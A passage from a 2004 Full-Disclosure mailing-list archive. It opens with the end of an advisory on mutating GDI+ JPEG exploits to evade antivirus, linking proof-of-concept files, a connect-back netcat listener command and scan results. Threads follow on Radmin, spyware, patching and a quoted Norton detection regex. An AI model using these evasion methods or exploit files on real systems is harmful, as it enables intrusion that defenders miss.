 with the buffer overflow string in the MIDDLE of the file.
 
 3) By combining various strings from methods described under 
 1) and 2) and by placing them in different locations in the 
 image file I was able to bypass various antivirus products.
 
 
 FIX
 
 1) Patch vulnerable systems.
 2) If your antivirus doesn't detect these variants, block 
 JPEG (xFFD8).
 
 
 DEMO
 
 http://www.hiddenbit.org/demo_files/jpeg.zip
 
 1) In the 1.jpg file the \xFE string was substituted with \xE1.
    WARNING! THIS IS COMPILED PROOF OF CONCEPT
    FROM [1] THAT WILL CONNECT BACK TO
    VULNERABLE MACHINE TO 127.0.0.1 AT
    PORT 777 ( run: nc -l -p 777 ).
 2) In 2.jpg the buffer overflow string is at offset x22F0 
    (the string that begins with \xFF\xED).
    THIS IS JUST AN IMAGE WITH BUFFER OVERFLOW.
 3) These are the results from [3]:
 For 1.jpg
 
 Results of a file scan
 This is the report of the scanning done over 1.jpg (see 
 Demo section) file that VirusTotal processed on 10/13/2004 at 
 18:54:56.
 Antivirus    Version         Update      Result
 BitDefender  7.0             10.12.2004  -
 ClamWin      devel-20040922  10.12.2004  -
 eTrust-Iris  7.1.194.0       10.13.2004  -
 F-Prot       3.15b           10.13.2004  -
 Kaspersky    4.0.2.24        10.13.2004  -
 McAfee       4398            10.13.2004  Exploit-MS04-028
 NOD32v2      1.893           10.13.2004  -
 Norman       5.70.10         10.12.2004  -
 Panda        7.02.00         10.13.2004  -
 Sybari       7.5.1314        10.13.2004  -
 Symantec     8.0             10.12.2004  Backdoor.Roxe
 TrendMicro   7.000           10.12.2004  Exploit-MS04-028
 
 For 2.jpg
 
 Results of a file scan
 This is the report of the scanning done over 2.jpg file 
 that VirusTotal processed on 10/13/2004 at 18:56:32.
 Antivirus    Version         Update      Result
 BitDefender  7.0             10.12.2004  -
 ClamWin      devel-20040922  10.12.2004  -
 eTrust-Iris  7.1.194.0       10.13.2004  -
 F-Prot       3.15b           10.13.2004  -
 Kaspersky    4.0.2.24        10.13.2004  -
 McAfee       4398            10.13.2004  Exploit-MS04-028
 NOD32v2      1.893           10.13.2004  -
 Norman       5.70.10         10.12.2004  -
 Panda        7.02.00         10.13.2004  -
 Sybari       7.5.1314        10.13.2004  -
 Symantec     8.0             10.12.2004  Bloodhound.Exploit.13
 TrendMicro   7.000           10.12.2004  Exploit-MS04-028
 
 
 Only the BIG 3 were able to detect those variants.
 
 More complete research will be published in my SANS GCIH paper.
 
 
 Reference :
 
 [1] www.k-otik.com
 [2] http://www.snort.org/snort-db/sid.html?sid=2705
 [3] www.virustotal.com
 
 
 
 **
 HiddenBit.org is a non-profit Israeli security research team.
 
 
 
 --
 Disclaimer
 
 The information within this advisory may change without 
 notice. There are no warranties, implied or express, with 
 regard to this information.
 In no event shall the author be liable for any direct or 
 indirect damages whatever arising out or in connection with 
 the use or spread of this information. Any use of this 
 information is at the user's own risk.
 
 


RE: [Full-Disclosure] Bypass of Antivirus software with GDI+ bug exploit Mutations

2004-10-14 Thread Todd Towles
Yep, sorry about that. Sophos isn't on VirusTotal's list... anyone running
it? 

 -Original Message-
 From: Cassidy Macfarlane [mailto:[EMAIL PROTECTED] 
 Sent: Thursday, October 14, 2004 10:42 AM
 To: Todd Towles; Andrey Bayora; [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]
 Subject: RE: [Full-Disclosure] Bypass of Antivirus software 
 with GDI+ bug exploit Mutations
 
 Symantec Enterprise 8.1:
 
 Your attachment JPEG.zip contained viruses:
  Backdoor.Roxe at location 1.jpg, 
  and Bloodhound.Exploit.13 at location 2.jpg.
 

RE: [Full-Disclosure] Possibly a stupid question RPC over HTTP

2004-10-13 Thread Todd Towles
Are you talking about the BITS change? Where it does BITS over HTTP? 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Daniel H. Renner
 Sent: Wednesday, October 13, 2004 10:37 AM
 To: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Possibly a stupid question RPC 
 over HTTP
 
 Daniel,
 
 Could you please point out where you read this data?  I would 
 like to see this one...
 --
 Daniel H. Renner [EMAIL PROTECTED] Los Angeles 
 Computerhelp
 
 
 On Tue, 2004-10-12 at 20:54, [EMAIL PROTECTED]
 wrote:
  Message: 18
  Date: Tue, 12 Oct 2004 12:41:56 -0700
  From: Daniel Sichel [EMAIL PROTECTED]
  To: [EMAIL PROTECTED]
  Subject: [Full-Disclosure] Possibly a stupid question RPC over HTTP
  
  This may just reflect my ignorance, but I read (and found hard to
  believe) that Microsoft has implemented RPC over HTTP. Is this not a
  HUGE security hole? If I understand it correctly it means that good old
  HTML or XML can invoke a process using standard web traffic (port 80)?
  Is there any permission checking done? What things can be invoked by RPC
  over HTTP? Jeeze, to me it looks like the barn door is now wide open. Am
  I right, and if so, how can I detect RPCs in web traffic to block this
  junk? Can ANY stateful packet filter see this stuff or is the pattern
  too broad in allowed RPCs?
  
  Again, I hope this is not a stupid question or inappropriate format for
  this; as somebody else recently said, there is already enough noise on
  this list. I would hate to see this list degenerate, it has been REALLY
  valuable to me as a network engineer on occasion.
  
  Thanks all,
  Dan Sichel
  Ponderosa telephone
  [EMAIL PROTECTED]
  
 
 


RE: [Full-Disclosure] Norton AntiVirus 2005 treats Radmin as a Virus ??!

2004-10-12 Thread Todd Towles
That is a widely used tool that is dropped by various malware programs. I think even 
one of the JPEG exploits was dropping radmin.exe

It would be better to assume you have an infection and prove yourself wrong than the other 
way around. Look into it pretty deep, I would suggest. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of Sowhat .
 Sent: Tuesday, October 12, 2004 7:51 AM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] Norton AntiVirus 2005 treats 
 Radmin as a Virus ??!
 
 hi list
 
 I have installed Norton AntiVirus 2005, and when I open my 
 F:\ directory, Norton pops up and shows "Norton AntiVirus 
 has detected a virus on your computer. Object Name: 
 F:\radmin.exe. Virus Name: Hacktool."
 
 Is RemoteAdministrator a commercial remote control software 
 or a Hacktool ?
 
 the following information is copied from the Radmin's site:
 (http://www.radmin.com/)
 
 This fast, reliable, easy-to-use pc remote control software 
 saves you hours of running up and down stairs between 
 computers. Radmin allows you to take control of another PC on 
 a LAN, WAN or dial-up connection so you see the remote 
 computer's screen on your monitor and all your mouse 
 movements and keystrokes are directly transferred to the 
 remote machine. Radmin provides fast secure access to remote 
 PC's on Windows platforms.  
 


RE: [Full-Disclosure] Norton AntiVirus 2005 treats Radmin as a Virus ??!

2004-10-12 Thread Todd Towles
I do agree with you Peter about the server and client part. I truly believe that 
Norton is detecting it as such only because it is being used in exploits. There are 
many exploits that drop this client onto the workstation. If you know it is there, then 
the detection shouldn't surprise you. But if you are e-mailing a list asking about it 
and what it is, you most likely didn't install it. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Peter Kruse
 Sent: Tuesday, October 12, 2004 10:41 AM
 To: Todd Towles; Sowhat .; [EMAIL PROTECTED]
 Subject: SV: [Full-Disclosure] Norton AntiVirus 2005 treats 
 Radmin as a Virus ??!
 
  
 Hi,
 
 Keep in mind that there's a client and a server part in the 
 Radmin installation. During installation of this commercial 
 software you'll have the option to choose whether you want to 
 install the server or only the client. 
 
 If the client software is detected as malicious this would 
 indeed be a bad call. However, if Symantec labels the server 
 as a backdoor risk, it's likely because it was distributed as 
 part of a malware package not so long ago (a few weeks back). 
 Still, this doesn't justify labelling the Radmin Client as a 
 security risk. The Radmin software is widely used for remote 
 administration in the same manner as VNC, Terminal Services 
 or Netbus ;-)
 
 Regards
 Peter Kruse
 


RE: [Full-Disclosure] House approves spyware legislation

2004-10-06 Thread Todd Towles
Why make more computer laws... when the current computer laws can not be
enforced correctly? We all know that the CAN-SPAM Act really cut the spam
out of our e-mails. *sigh* Then the INDUCE act will make half the stuff
in a normal person's house illegal. 

Making laws is just playing around...paper on top of paper doesn't stop
anything. It all falls back to the old saying - Action speaks louder
than words.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Gregory Gilliss
 Sent: Wednesday, October 06, 2004 7:04 AM
 To: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] House approves spyware legislation
 
 Great. Not that I'm any fan of spyware, but this is just 
 another law against hacking. Think - what's the difference 
 between this and someone using XSS to take control of a 
 computer? If you r00t a box and deface the home page, then 
 you've broken this law.
 
 *sigh* Instead of fixing the problem (poor software security) 
 we pass laws to punish the people who do the things that 
 illustrate the problem.
 Basic philosophical differences, blah blah blah ...
 
 Worst of all, do you really think that the spyware rackets 
 will slow down or cease because of this? Nope - they'll just 
 migrate out of the jurisdiction.
 
 -- Greg
 
 On or about 2004.10.06 06:03:18 +, RandallM 
 ([EMAIL PROTECTED]) said:
 

  
  The U.S. House of Representatives voted late Tuesday to 
 restrict some 
  of the most deceptive forms of spyware.
  
  By a 399-1 vote, House members approved legislation prohibiting 
  taking control of a computer, surreptitiously modifying a Web 
  browser's home page, or disabling antivirus software 
 without proper authorization.
  
  
  http://news.com.com/House+approves+spyware+legislation/2100-1028_3-5397822.html?tag=nefd.top
  
   
  thank you
  Randall M
   
  
 
 -- 
 Gregory A. Gilliss, CISSP  
 E-mail: [EMAIL PROTECTED]
 Computer Security WWW: 
 http://www.gilliss.com/greg/
 PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 
 D9 B4 14 0E 8C A3
 


RE: [Full-Disclosure] real spam from secure@microsoft.com ?

2004-10-06 Thread Todd Towles
Well, the e-mail did say this: "You are receiving this email because
you have communicated with the Microsoft Security Response Center using
PGP in the past." Therefore it would make sense that they tell you about
their new PGP key... as long as the sender is real... but that is another
story.


 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Georgi Guninski
 Sent: Wednesday, October 06, 2004 6:18 AM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] real spam from [EMAIL PROTECTED] ?
 
 got this in my mailbox.
 
 looks like spam from [EMAIL PROTECTED]
 
 they don't even provide unsubscribe instructions.
 
 lamers.
 
 --
 georgi
 
 - Forwarded message from Microsoft Security Response 
 Center [EMAIL PROTECTED] -
 
 X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
 Subject: New Microsoft Security Response Center PGP Key [pgp]
 Date: Tue, 5 Oct 2004 15:40:01 -0700
 X-MS-Has-Attach: 
 X-MS-TNEF-Correlator: 
 Thread-Topic: New Microsoft Security Response Center PGP Key [pgp]
 Thread-Index: AcSrLElFE3KUx/ffQnuyvPfsYOdiBg==
 From: Microsoft Security Response Center [EMAIL PROTECTED]
 Cc: Microsoft Security Response Center [EMAIL PROTECTED]
 X-OriginalArrivalTime: 05 Oct 2004 22:40:30.0206 (UTC) 
 FILETIME=[512D71E0:01C4AB2C]
 X-MailScanner-Information: Please contact the ISP for more information
 X-MScanner: Clean
 
 Hello!
 
 The Microsoft Security Response Center has generated a new 
 PGP key. We use this key to sign all security bulletin 
 notifications and encourage others to use this key when 
 sending sensitive information to us. Our new key is available at:
 
 - https://www.microsoft.com/technet/security/bulletin/pgp.mspx
 - ldap://keyserver.pgp.com/ and other public PGP key servers
 - At the bottom of this message
 
 You can verify the fingerprint of our key at:
 
 - https://www.microsoft.com/technet/security/bulletin/pgp.mspx
 
 A revoked copy of our former key is available at:
 
 - ldap://keyserver.pgp.com/ and other public PGP key servers
 - At the bottom of this message
 
 If you would like to submit an encrypted security 
 vulnerability report, please email us at [EMAIL PROTECTED]
 
 Sincerely,
 Microsoft Security Response Center
 
 
 New Key (0xAA55BC66):
 
 

RE: [Full-Disclosure] Sans GDI scan says still vulnerable after patching

2004-10-06 Thread Todd Towles
I suggest you search in the patchmanagement mailing list on
patchmanagement.org 

Sorry to tell you, but the OS isn't the only thing that needs patching.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 BillyBobKnob
 Sent: Wednesday, October 06, 2004 10:16 AM
 To: Full Disclosure
 Subject: [Full-Disclosure] Sans GDI scan says still 
 vulnerable after patching
 
 I have patched some systems at work with the MS04-028 patch 
 and then ran the Sans GDI scanner which said that they are 
 still vulnerable.
 Any ideas why ?
 
 F:\WINDOWS\system32\dllcache\sxs.dll
 
 Version: 5.1.2600.136 -- Vulnerable version
 
 F:\WINDOWS\system32\sxs.dll
 
 Version: 5.1.2600.136 -- Vulnerable version
 
 
 
 Thanks
 Bill


RE: [Full-Disclosure] Re: Spyware installs with no interaction in IE on fully patched XP SP2 box

2004-10-04 Thread Todd Towles
To expand on this "About Wrap" page. I have posted images to this site
before... before the site went downhill. Some of the authors would allow
the site to wrap their images with ads (therefore making money for the
site). It appears they are now wrapping images with installed ad-ware. 

It appears the new owners have taken it over for the money. Not the
artwork. Just my 2 cents

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Willem Koenings
 Sent: Monday, October 04, 2004 9:55 AM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] Re: Spyware installs with no 
 interaction in IE on fully patched XP SP2 box
 
 
 hi,
 
  I was unable to verify it, since I don't use IE, and would 
 prefer not 
  infecting myself on accident, however I did run across this:
  
  http://themexp.org/about_wrap.php
  
  Perhaps one of the themes you downloaded was bundled with 
 the spyware?
 
 two tiny links from there:
 
 http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
 http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab
 
 W.
 
 
 


FW: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1933 - 20 msgs

2004-09-29 Thread Todd Towles
 Meant for the list I believe. 

-Original Message-
From: GuidoZ [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, September 29, 2004 1:05 PM
To: Todd Towles
Subject: Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1933 -
20 msgs

That's also my understanding, and experience, from testing it. I'm sure
it's possible to find other ways to toy with JPEG parsing, such as
wallpaper. (I believe Todd brought this up before somewhere.) Try it
with Active Desktop (as you'll need to when setting a JPEG to
wallpaper), which uses IE to parse/display.

--
Peace. ~G


On Tue, 28 Sep 2004 11:41:48 -0500, Todd Towles
[EMAIL PROTECTED] wrote:
 It is possible to view a JPEG in an unpatched IE and it will automatically 
 install programs.
 
 This is my understanding.



RE: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1933 - 20

2004-09-28 Thread Todd Towles
What if it copies itself to the wallpaper? 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Geo.
Sent: Tuesday, September 28, 2004 1:27 PM
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1933 -
20

far-fetched.  Would it be possible to create a jpeg that would copy
itself to other drives on a shared network in an auto-executable
position?  I suppose so... however, it would be noisy and probably
wouldn't be amazingly successful.

Picture a company full of users and a worm that copies the jpg file to
\\machinename\c$\Documents and Settings\All Users\Desktop

you think it might get a few clicks, especially if it had a harmless
yet tempting name like saturn.jpg

Geo.



FW: [Full-Disclosure] JPEG AV Detection

2004-09-28 Thread Todd Towles
 What exactly are the AV products detecting in the JPEG exploits? Barry
and I were talking about how impressed we were that the AV companies
jumped on this one and detection was pretty fast. But is the detection
so generic that a variant will bypass? Is the detection based on an
original exploit that could be modified in a way that makes it
undetectable right now?

-Todd

-Original Message-
From: Barry Fitzgerald [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, September 28, 2004 1:55 PM
To: Todd Towles
Subject: Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1933 -
20 msgs

Todd Towles wrote:

Yep, really surprised. Just hopefully the invalid data that is being 
detected can't be changed or worked in a way that would bypass normal 
detection. Once the file is renamed to a BMP or a GIF, you confuse the 
whole thing even more.

Are the AV products hitting on a part of the original exploit? Can this
part be changed in a future version to make it undetectable? I am 
very impressed at the work of the AV companies on this one, but I also
know that if this detection is too simple, it will be bypassed.


I'm not sure what they're specifically detecting.  This may be a good
question for the list.

 -Barry



RE: FW: [Full-Disclosure] JPEG AV Detection

2004-09-28 Thread Todd Towles
That would seem to be in the Char_Header function... 

-Original Message-
From: Aaron Horst [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, September 28, 2004 3:08 PM
To: [EMAIL PROTECTED]
Cc: Todd Towles
Subject: RE: FW: [Full-Disclosure] JPEG AV Detection

Best I can tell, the Norton filter looks something like this:

\xFF\xD8.*\xFF[\xE1\xE2\xED\xFE]\x00[\x00\x01].*

AnthraX101

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

